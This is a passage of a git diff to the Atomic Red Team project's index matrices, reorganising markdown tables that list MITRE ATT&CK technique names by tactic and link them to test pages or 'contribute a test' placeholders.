-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
-| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
+| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
+| | | | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index 8e86b5dd..702a3db3 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -2,47 +2,52 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
